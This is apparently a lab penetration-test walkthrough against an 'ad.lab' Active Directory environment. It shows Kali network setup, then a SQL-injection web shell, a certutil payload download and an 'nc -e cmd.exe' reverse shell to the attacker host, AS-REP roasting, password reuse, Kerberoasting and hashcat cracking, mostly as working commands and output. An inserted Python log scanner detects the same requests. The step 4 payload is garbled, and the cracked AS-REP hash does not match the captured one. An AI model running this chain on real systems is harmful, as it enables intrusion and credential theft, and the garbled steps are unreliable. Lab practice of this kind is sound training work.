Kali Install and Networking

1. Download Kali, Extract the ZIP File, and Open it in VMWare


a. Download Kali for VMWare: https://www.kali.org/get-kali/#kali-virtual-machines

b. Extract the Kali Install Folder

c. After the Extraction is Complete, Open the Kali Image in VMWare

2. Set the VM Memory to 4096 MB


a. Right-clicked the VM in VMWare and clicked "Settings".

b. Changed the Memory to 4096 MB.

3. Set the First Network Adapter to "Custom (VMnet1)" and the second Network Adapter to NAT


a. Selected "Network Adapter" in VMWare Settings and selected "Custom (VMnet1)" under "Network connection".

b. Clicked "Add", "Network Adapter", and "Finish" to add a NAT Adapter.

c. Clicked "OK" to exit "Virtual Machine Settings".

d. Started the VM.

4. Configured Kali Networking

┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
    address 10.10.14.10
    netmask 255.255.255.0


┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/NetworkManager/NetworkManager.conf
[main]
plugins=ifupdown,keyfile
dns=dnsmasq

[ifupdown]
managed=false


┌──(kali㉿kali)-[~]
└─$ sudo mkdir -p /etc/NetworkManager/dnsmasq.d


┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/NetworkManager/dnsmasq.d/lab.conf
server=/ad.lab/10.10.14.1


┌──(kali㉿kali)-[~]
└─$ sudo systemctl restart NetworkManager


┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/resolv.conf
# Generated by NetworkManager
search localdomain
nameserver 127.0.0.1
options edns0 trust-ad


┌──(kali㉿kali)-[~]
└─$ shutdown -r now

5. Confirmed DNS Resolution (Internal + External)

┌──(kali㉿kali)-[~]
└─$ nslookup ad.lab
Server:         127.0.0.1
Address:        127.0.0.1#53

Name:   ad.lab
Address: 10.10.14.1
Name:   ad.lab
Address: 192.168.2.143


┌──(kali㉿kali)-[~]
└─$ nslookup google.com
Server:         127.0.0.1
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   google.com
Address: 192.0.0.88

6. Mapped Internal Lab Hosts in /etc/hosts

┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.14.20     web01.ad.lab
10.10.14.40     web02.ad.lab
10.10.14.60     dmz01.ad.lab
10.10.14.80     mail01.ad.lab
10.10.14.100    dev01.ad.lab
10.10.14.120    admin04.ad.lab
10.10.14.140    admin03.ad.lab
10.10.14.160    admin02.ad.lab
10.10.14.180    admin01.ad.lab
10.10.14.200    files01.ad.lab

7. Confirmed Kerberos and LDAP Connection to the Domain Controller

┌──(kali㉿kali)-[~]
└─$ nc -zv 10.10.14.1 88
10.10.14.1: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.14.1] 88 (kerberos) open


┌──(kali㉿kali)-[~]
└─$ openssl s_client -connect 10.10.14.1:636 -showcerts
Connecting to 10.10.14.1
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN=dc01.ad.lab
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN=dc01.ad.lab
verify return:1
---
Certificate chain
 0 s:CN=dc01.ad.lab
   i:CN=dc01.ad.lab
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA1
   v:NotBefore: Jan 11 04:53:00 2025 GMT; NotAfter: Jan 11 05:13:00 2026 GMT
-----BEGIN CERTIFICATE-----
[PEM certificate body omitted]
-----END CERTIFICATE-----
---
Server certificate
subject=CN=dc01.ad.lab
issuer=CN=dc01.ad.lab
---
No client certificate CA names sent
Requested Signature Algorithms: RSA-PSS+SHA256:RSA-PSS+SHA384:RSA-PSS+SHA512:RSA+SHA256:RSA+SHA384:RSA+SHA1:ECDSA+SHA256:ECDSA+SHA384:ECDSA+SHA1:DSA+SHA1:RSA+SHA512:ECDSA+SHA512
Shared Requested Signature Algorithms: RSA-PSS+SHA256:RSA-PSS+SHA384:RSA-PSS+SHA512:RSA+SHA256:RSA+SHA384:ECDSA+SHA256:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1329 bytes and written 548 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
This TLS version forbids renegotiation.
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: 7484492FF13316A68B71754CE967E0A042E2BE79E1C5C90F62076486DB92A2AC
    Session-ID-ctx:
    Resumption PSK: 0B4240C446C99950107DABE57E8ED4B95D2B8BBE844B4239348239E9D3DF23F9ABA70416564C9F030C7DE08FD2A809D5
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 36000 (seconds)
    TLS session ticket:
    0000 - 13 46 00 00 a2 eb 47 76-f0 e7 66 95 31 6d 18 93   .F....Gv..f.1m..
    0010 - 93 8a 04 b7 cd dc b5 8e-85 f5 5b 4d d1 53 36 83   ..........[M.S6.

    Start Time: 1736813116
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
---
read R BLOCK

WEB01 Attacks

1. Found an Apache Web Application on WEB01

┌──(kali㉿kali)-[~]
└─$ nmap -p 80 -sVC 10.10.14.20
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-15 17:27 EST
Nmap scan report for 10.10.14.20
Host is up (0.00021s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
MAC Address: 00:0C:29:47:BE:38 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.34 seconds

2. Enumerated the Web Application

┌──(kali㉿kali)-[~]
└─$ whatweb http://10.10.14.20/index.html
http://10.10.14.20/index.html [200 OK] Apache[2.4.58], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12], IP[10.10.14.20], OpenSSL[3.1.3], PHP[8.2.12], PasswordField[password], Title[Vulnerable Login]

3. Visually Inspected the Web Page

┌──(kali㉿kali)-[~]
└─$ firefox http://10.10.14.20/index.html

4. Injected a Web Shell via the "Username" Field

a. Injected this PHP code into the "Username" field:

' UNION SELECT 1,";,3 INTO OUTFILE 'C:/xampp/htdocs/shell.php' #

b. Then entered a random value for the password and clicked "Login"

Browser Response:
Warning: Attempt to read property "num_rows" on bool in C:\xampp\htdocs\index.php on line 31
Invalid username or password.

5. Verified the Web Shell Installation

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.14.20/shell.php?cmd=whoami
1       ad\aaron
        3

6. Injected PHP code to Download nc.exe

a. Clicked the back button in Firefox and injected this PHP code into the "Username" field:

' UNION SELECT 1,"<?php system('certutil -urlcache -f http://10.10.14.10:8000/nc.exe C:/xampp/htdocs/nc.exe'); ?>",3 INTO OUTFILE 'C:/xampp/htdocs/download_nc.php' #

b. Then entered a random value for the password and clicked "Login"

Browser Response:
Warning: Attempt to read property "num_rows" on bool in C:\xampp\htdocs\index.php on line 31
Invalid username or password.

7. Copied nc.exe to the current working directory

┌──(kali㉿kali)-[~]
└─$ find / -name nc.exe -type f 2>/dev/null
/usr/share/windows-resources/binaries/nc.exe

┌──(kali㉿kali)-[~]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .

8. Started a Python3 HTTP Server to Serve nc.exe

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

9. Executed the PHP File to Download nc.exe from Kali

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.14.20/download_nc.php
1       ****  Online  ****
CertUtil: -URLCache command completed successfully.
        3

10. Triggered the Reverse Shell

┌──(kali㉿kali)-[~]
└─$ curl "http://10.10.14.20/shell.php?cmd=C:\xampp\htdocs\nc.exe%2010.10.14.10%204444%20-e%20cmd.exe"

11. Spawned a Reverse Shell as Aaron

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.20] 49858
Microsoft Windows [Version 10.0.26100.2894]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami
whoami
ad\aaron
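From the defender's side, the requests in steps 4 to 11 leave a distinctive trail in the Apache access log. The following is an added example, not code from the write-up, that scans combined-format log lines for that trail; the sample lines and the allow-list of the application's own PHP files are constructed for the example.

```python
#!/usr/bin/env python3
"""Flag web-shell style requests in an Apache access log (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined-log format, modelled on the
# requests WEB01 received in the steps above; they are not real log data.
SAMPLE_LOG = r"""10.10.14.10 - - [15/Feb/2025:17:40:01 -0500] "GET /index.html HTTP/1.1" 200 346 "-" "Mozilla/5.0"
10.10.14.10 - - [15/Feb/2025:17:41:12 -0500] "POST /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.10 - - [15/Feb/2025:17:42:30 -0500] "GET /shell.php?cmd=whoami HTTP/1.1" 200 27 "-" "curl/8.11.1"
10.10.14.10 - - [15/Feb/2025:17:44:05 -0500] "GET /download_nc.php HTTP/1.1" 200 88 "-" "curl/8.11.1"
10.10.14.10 - - [15/Feb/2025:17:45:19 -0500] "GET /shell.php?cmd=C:\xampp\htdocs\nc.exe%2010.10.14.10%204444%20-e%20cmd.exe HTTP/1.1" 200 0 "-" "curl/8.11.1"
"""

# PHP entry points the application legitimately ships with.
# Assumption for this example: the login app consists of index.php only.
KNOWN_PHP = {"/index.php"}

# Query parameter names commonly used by one-line web shells.
COMMAND_PARAMS = {"cmd", "command", "exec", "c"}

# Tool names that have no business in the query string of a login page.
TOOL_MARKERS = ("nc.exe", "certutil", "cmd.exe", "powershell")

# Apache combined log: client, ident, user, [timestamp], "METHOD target PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def inspect_request(target, known_php=KNOWN_PHP):
    """Return the reasons (possibly none) a request target looks like web-shell use."""
    parts = urlsplit(target)
    reasons = []
    # A .php file that was never deployed is exactly what INTO OUTFILE leaves behind.
    if parts.path.lower().endswith(".php") and parts.path not in known_php:
        reasons.append("php file outside deployed application")
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in params:
        if name.lower() in COMMAND_PARAMS:
            reasons.append(f"command-style query parameter '{name}'")
    # parse_qs has already percent-decoded the values, so "%20" is a space here.
    decoded = " ".join(v for values in params.values() for v in values).lower()
    for marker in TOOL_MARKERS:
        if marker in decoded:
            reasons.append(f"query references {marker}")
    return reasons


def analyze(log_text, known_php=KNOWN_PHP):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = inspect_request(entry["target"], known_php)
        if reasons:
            findings.append({
                "line": number,
                "ip": entry["ip"],
                "method": entry["method"],
                "path": urlsplit(entry["target"]).path,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['method']} {f['path']} -> {', '.join(f['reasons'])}")
```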

12. Enumerated Domain Users

C:\xampp\htdocs> net users /domain
net users /domain
The request will be processed at a domain controller for domain AD.LAB.

User accounts for \\DC01.AD.LAB

-------------------------------------------------------------------------------
Aaron                    Administrator            Betty
Chris                    Daniela                  Ernesto
Francesca                Gregory                  Guest
Helen                    iis_service              Issac
Jamie                    krbtgt
The command completed successfully.

13. Created a file named “users.txt” for use in the AS-REP roasting process.

┌──(kali㉿kali)-[~]
└─$ echo -e "Aaron\nAdministrator\nBetty\nChris\nDaniela\nErnesto\nFrancesca\nGregory\nGuest\nHelen\niis_service\nIssac\nJamie" > users.txt

14. Executed AS-REP roasting against the domain “ad.lab” for the accounts in users.txt; only “ernesto” (pre-authentication not required) returned a Kerberos AS-REP hash.

┌──(kali㉿kali)-[~]
└─$ impacket-GetNPUsers ad.lab/ -no-pass -usersfile users.txt -dc-ip 10.10.14.1 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Aaron doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Betty doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Chris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Daniela doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$Ernesto@AD.LAB:27a8986e6cf261aac13722f4559a6b30$39dbdfcc6086e04997697426bebd12264a5be679ee3378962c8e699984a5bdfda397239eb1396789815028e79237ec10061ffa693b7bca24577c2e1e90ba6e43dd938c6bd09a42329bf45876a6b0e3a10c534b4d5e986d120059f80c52112c9efe5621a2f997ce0140a415024b283122391d04fb3c161e29a6cfbb32d32e9d73640a3d01c2c4f60748a1bca89f5edca0805ffca2e1926c7504988303bbd256a6ec929b6350bfe7b8f64337cd0166ab42dd586fbbfcea52cfa60cedd59926861b0d74c6f8ee9230b088d5baa9a41b765d0b65b3145e16b38a9fa72c7cd5c800621060590024088e28d94e89ee17fc991a
[-] User Francesca doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gregory doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)
[-] User Helen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User iis_service doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Issac doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jamie doesn't have UF_DONT_REQUIRE_PREAUTH set

15. Decompressed the rockyou.txt.gz wordlist

┌──(kali㉿kali)-[~]
└─$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz

16. Used Hashcat to crack the extracted AS-REP hash with the RockYou wordlist, revealing the password “lucky#1”

┌──(kali㉿kali)-[~]
└─$ sudo hashcat -m 18200 '$krb5asrep$23$ernesto@AD.LAB:12583a96f33e9dc7dcb271771d13a9b9$63075b3af86cb8e9b2903b1a00a7d552ced69220b536d7e8b03e3787b5fa9def42594c14f5368c45256a199d961d611df00d16e6feb5d760fd808da61f5803c66ff0f0dd3749d729fe48ba7681f1c206c40381f823b7b58b74816f6d1fb8ca0450dc7f7412da762f8c5ef27018dfaf8b5eb8101d946665884eb44df9c0ae57ae429aabb103ce6510b76f4464d8ce6aede1ac361134771ab8551f31fb577959fdde9c2f793604b50dd5c81867fcd1354160fd9d63ab3d606c0404e8de41b6e2408b997ddbbaf5be161f72903c87605e9bb48bb0e22b9fb1863086b6cda80ed8404c93c440e325414c4ae8dc4fd881165d' /usr/share/wordlists/rockyou.txt
[sudo] password for kali: 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344397
* Bytes.....: 139921596
* Keyspace..: 14344390
* Runtime...: 1 sec

$krb5asrep$23$ernesto@AD.LAB:12583a96f33e9dc7dcb271771d13a9b9$63075b3af86cb8e9b2903b1a00a7d552ced69220b536d7e8b03e3787b5fa9def42594c14f5368c45256a199d961d611df00d16e6feb5d760fd808da61f5803c66ff0f0dd3749d729fe48ba7681f1c206c40381f823b7b58b74816f6d1fb8ca0450dc7f7412da762f8c5ef27018dfaf8b5eb8101d946665884eb44df9c0ae57ae429aabb103ce6510b76f4464d8ce6aede1ac361134771ab8551f31fb577959fdde9c2f793604b50dd5c81867fcd1354160fd9d63ab3d606c0404e8de41b6e2408b997ddbbaf5be161f72903c87605e9bb48bb0e22b9fb1863086b6cda80ed8404c93c440e325414c4ae8dc4fd881165d:lucky#1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$ernesto@AD.LAB:12583a96f33e9dc7dcb271...81165d
Time.Started.....: Fri Feb  7 00:43:47 2025 (0 secs)
Time.Estimated...: Fri Feb  7 00:43:47 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1787.0 kH/s (0.83ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 112640/14344390 (0.79%)
Rejected.........: 0/112640 (0.00%)
Restore.Point....: 110592/14344390 (0.77%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: mutulica -> chancey1
Hardware.Mon.#1..: Util: 36%

Started: Fri Feb  7 00:43:46 2025
Stopped: Fri Feb  7 00:43:48 2025

17. Found a password hardcoded in the phpMyAdmin configuration file

C:\xampp\htdocs> type C:\xampp\phpMyAdmin\config.inc.php | findstr "'password'"
type C:\xampp\phpMyAdmin\config.inc.php | findstr "'password'"
$cfg['Servers'][$i]['password'] = 'tt.r.2006';

18. Enumerated User Profiles on WEB01 (Domain Users Who Have Logged On)

C:\xampp\htdocs> dir C:\Users\
dir C:\Users\
 Volume in drive C has no label.
 Volume Serial Number is D637-439E

 Directory of C:\Users
02/14/2025  08:38 PM    DIR          .
02/14/2025  08:38 PM    DIR          aaron
02/14/2025  01:25 PM    DIR          LocalUser
02/14/2025  01:23 PM    DIR          Public
               0 File(s)              0 bytes
               6 Dir(s)  42,891,587,584 bytes free

19. Installed Kerberos packages and configured the AD.LAB realm settings to enable Kerberos communication with the domain controller.

┌──(kali㉿kali)-[~]
└─$ sudo apt install -y krb5-user libkrb5-dev libsasl2-modules-gssapi-mit
krb5-user is already the newest version (1.21.3-4).
libkrb5-dev is already the newest version (1.21.3-4).
libkrb5-dev set to manually installed.
The following packages were automatically installed and are no longer required:
  firebird3.0-common      libgtksourceview-3.0-common
  firebird3.0-common-doc  libgtksourceviewmm-3.0-0v5
  libbfio1                libhdf5-103-1t64
  libc++1-19              libhdf5-hl-100t64
  libc++abi1-19           libjxl0.9
  libcapstone4            libmbedcrypto7t64
  libconfig++9v5          libpaper1
  libconfig9              libpoppler140
  libdirectfb-1.7-7t64    libsuperlu6
  libegl-dev              libtag1v5
  libfmt9                 libtag1v5-vanilla
  libgdal35               libtagc0
  libgl1-mesa-dev         libunwind-19
  libgles-dev             libwebrtc-audio-processing1
  libgles1                libx265-209
  libglvnd-core-dev       openjdk-23-jre
  libglvnd-dev            openjdk-23-jre-headless
  libgtksourceview-3.0-1  python3-appdirs
Use 'sudo apt autoremove' to remove them.

Installing:
  libsasl2-modules-gssapi-mit

Summary:
  Upgrading: 0, Installing: 1, Removing: 0, Not Upgrading: 37
  Download size: 32.5 kB
  Space needed: 124 kB / 62.2 GB available

Get:1 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules-gssapi-mit amd64 2.1.28+dfsg1-8+b1 [32.5 kB]
Fetched 32.5 kB in 1s (32.2 kB/s)
Selecting previously unselected package libsasl2-modules-gssapi-mit:amd64.
(Reading database ... 413314 files and directories currently installed.)
Preparing to unpack .../libsasl2-modules-gssapi-mit_2.1.28+dfsg1-8+b1_amd64.deb ...
Unpacking libsasl2-modules-gssapi-mit:amd64 (2.1.28+dfsg1-8+b1) ...
Setting up libsasl2-modules-gssapi-mit:amd64 (2.1.28+dfsg1-8+b1) ...


Inputs during Installation:
Default Kerberos version 5 realm: AD.LAB
Kerberos servers for your realm: 10.10.14.1
Administrator server for your Kerberos realm: DC01.AD.LAB

20. Reused the password to request a Kerberos Ticket Granting Ticket (TGT) for ad\aaron

┌──(kali㉿kali)-[~]
└─$ kinit aaron
Password for aaron@AD.LAB: tt.r.2006

21. Verified the Kerberos Ticket Cache

┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: aaron@AD.LAB

Valid starting       Expires              Service principal
02/07/2025 05:06:52  02/07/2025 15:06:52  krbtgt/AD.LAB@AD.LAB
        renew until 02/08/2025 05:06:44

22. Exported the Kerberos Ticket Cache Path as an Environment Variable

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000

23. Used Aaron's Kerberos Ticket to Perform Kerberoasting against the Domain Controller

┌──(kali㉿kali)-[~]
└─$ impacket-GetUserSPNs -request -k -dc-ip 10.10.14.1 ad.lab/aaron -debug -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Getting machine hostname
[+] Connecting to 10.10.14.1, port 389, SSL False
[+] Using Kerberos Cache: /tmp/krb5cc_1000
[+] SPN LDAP/DC01.AD.LAB@AD.LAB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/AD.LAB@AD.LAB
[+] Using TGT from cache
[+] Trying to connect to KDC at 10.10.14.1:88
[+] Connecting to 10.10.14.1, port 636, SSL True
[+] Using Kerberos Cache: /tmp/krb5cc_1000
[+] SPN LDAP/DC01.AD.LAB@AD.LAB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/AD.LAB@AD.LAB
[+] Using TGT from cache
[+] Trying to connect to KDC at 10.10.14.1:88
[+] Total of records returned 4
ServicePrincipalName  Name         MemberOf  PasswordLastSet             LastLogon
--------------------  -----------  --------  --------------------------  --------------------------
HTTP/web02.ad.lab     iis_service            2025-02-07 00:29:12.423410  2025-02-07 00:30:48.187474


[+] Using Kerberos Cache: /tmp/krb5cc_1000
[+] Returning cached credential for KRBTGT/AD.LAB@AD.LAB
[+] Using TGT from cache
[+] Username retrieved from CCache: aaron
[+] Trying to connect to KDC at 10.10.14.1:88
$krb5tgs$23$*iis_service$AD.LAB$ad.lab/iis_service*$e5bc8efac93e25d95774768cc0205fad$d5a45703e272ace010bc318ee6105be728adf86b2245ef21020172a8d254f226921a6df938e9ed3592c148408f27e7f806874494922c26399e14abe060b1678203992bc67abfab5186bd639256bcd703b233abab8f43a90df20a0a965c497f10a51e0ea5d3e0617d79b83e3347f9d53aca56cee8f260bae936d8df9302b51be5e82d0385504cd025f213b2befd54d805e73559ca27cc7eb405845fcb911f9efec8c09a1d72663e5385e09f4bc5af67efcf568aff5580f71660ac3cfe4ee0fd8381777c83900838a8dbf48ca649302aae3098f5349859bf4c6e7b12eaf78824d5fa7620a9bedb3d4eccd8b9e152c18b123c38fae001669dfb7f7face1e782e3e2c19d4e750f37584598f803aec470954d691d5e02664812a9ec3b1613d830a49fff5786eb9ca4109cf1e63832f1d846d359a31f3771a7672e8703da296414ccbc84dcfb2b57ce8e062554dbb5c657137c10faabbe57db1ef944f4cd5b00bb7fcdf5925b4e5e4812268121cdcd2cd53da578bec0eb1e82e1bc2e25b08542f086f937d20778942942d6f54964c759a38b675a8d2b50aa36c4d3b976c005452e536d4c67fc6f4aa79ac138b477de7361e6c3b974f1ed5a31a9e4409ee3157d667d9e0286f17e40efdff4be7d31c98f43e1315d24bdb31e5c1d9fa5f5638e94b52a4c76d0dce5f3fdf9cc0a893605e0f8adf1c774ade0060c4a10e60db2a0ab0587e898b9026d01dfeb2e23e7e4679d38f0dfd97abed82ed1f6ec413266b58cf58026dddeec224a38f8de9ea0ce1505ea75808958e4748a7591b1845e860b832ec56677c76242296e0dc943061f28ffab30ed8fe231ce19cee188c65b48d7b59dc379878984443c1c663f3297601deaea805889e8a6c084ca4755139693a7ffca8dedb881380df6da5e770362dcefca16d993b9e049cbb38dbdb9ab34621d15616c0f3cd1d76f7b2bcdb4b23749428c73aa15713ed24fb38c3f8fd1c22101f154c5e799fafbf840ab09ff81502b2184c6a63be186ba63fe439cefbab09d3c3f961c8c59d4f0c164c3ac57045d7e1f03e54088b4501588e6c1716874351d931ac5f901932c4f0c979db8fa775df36c977633b5f4a5b77737ef2909ee10ea47aef6f2c9f804fec09e572ce4644a6ff52ef1542d4f87a29243937ef6da241237e79b4ae3ec4fc017999eb112b5c498385d001533bf4fc8db8163d9ad7bed7aa67d1da9a6b860432442a982ea16afa48ae67ff7567bffded92bd9d0be843b8dbaae1b4cd3f7ccc78becc030139e27ccf94f7b97161a727cc8a5db6487621d9decd91ab02b907cefbfedafcd301010db626e4c6913ae1915b81b49dceda9fc22de4c3
f8c9c389a4ff3e4c07b26ca7e3ba64d3e01cc1119a911ed6e66d66de0f522

24. Cracked the Kerberoasted iis_service Hash, revealing the password "daisy_3"

┌──(kali㉿kali)-[~]
└─$ hashcat -m 13100 '$krb5tgs$23$*iis_service$AD.LAB$ad.lab/iis_service*$e5bc8efac93e25d95774768cc0205fad$d5a45703e272ace010bc318ee6105be728adf86b2245ef21020172a8d254f226921a6df938e9ed3592c148408f27e7f806874494922c26399e14abe060b1678203992bc67abfab5186bd639256bcd703b233abab8f43a90df20a0a965c497f10a51e0ea5d3e0617d79b83e3347f9d53aca56cee8f260bae936d8df9302b51be5e82d0385504cd025f213b2befd54d805e73559ca27cc7eb405845fcb911f9efec8c09a1d72663e5385e09f4bc5af67efcf568aff5580f71660ac3cfe4ee0fd8381777c83900838a8dbf48ca649302aae3098f5349859bf4c6e7b12eaf78824d5fa7620a9bedb3d4eccd8b9e152c18b123c38fae001669dfb7f7face1e782e3e2c19d4e750f37584598f803aec470954d691d5e02664812a9ec3b1613d830a49fff5786eb9ca4109cf1e63832f1d846d359a31f3771a7672e8703da296414ccbc84dcfb2b57ce8e062554dbb5c657137c10faabbe57db1ef944f4cd5b00bb7fcdf5925b4e5e4812268121cdcd2cd53da578bec0eb1e82e1bc2e25b08542f086f937d20778942942d6f54964c759a38b675a8d2b50aa36c4d3b976c005452e536d4c67fc6f4aa79ac138b477de7361e6c3b974f1ed5a31a9e4409ee3157d667d9e0286f17e40efdff4be7d31c98f43e1315d24bdb31e5c1d9fa5f5638e94b52a4c76d0dce5f3fdf9cc0a893605e0f8adf1c774ade0060c4a10e60db2a0ab0587e898b9026d01dfeb2e23e7e4679d38f0dfd97abed82ed1f6ec413266b58cf58026dddeec224a38f8de9ea0ce1505ea75808958e4748a7591b1845e860b832ec56677c76242296e0dc943061f28ffab30ed8fe231ce19cee188c65b48d7b59dc379878984443c1c663f3297601deaea805889e8a6c084ca4755139693a7ffca8dedb881380df6da5e770362dcefca16d993b9e049cbb38dbdb9ab34621d15616c0f3cd1d76f7b2bcdb4b23749428c73aa15713ed24fb38c3f8fd1c22101f154c5e799fafbf840ab09ff81502b2184c6a63be186ba63fe439cefbab09d3c3f961c8c59d4f0c164c3ac57045d7e1f03e54088b4501588e6c1716874351d931ac5f901932c4f0c979db8fa775df36c977633b5f4a5b77737ef2909ee10ea47aef6f2c9f804fec09e572ce4644a6ff52ef1542d4f87a29243937ef6da241237e79b4ae3ec4fc017999eb112b5c498385d001533bf4fc8db8163d9ad7bed7aa67d1da9a6b860432442a982ea16afa48ae67ff7567bffded92bd9d0be843b8dbaae1b4cd3f7ccc78becc030139e27ccf94f7b97161a727cc8a5db6487621d9decd91ab02b907cefbfedafcd301010db626e4c6913ae191
5b81b49dceda9fc22de4c3f8c9c389a4ff3e4c07b26ca7e3ba64d3e01cc1119a911ed6e66d66de0f522' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

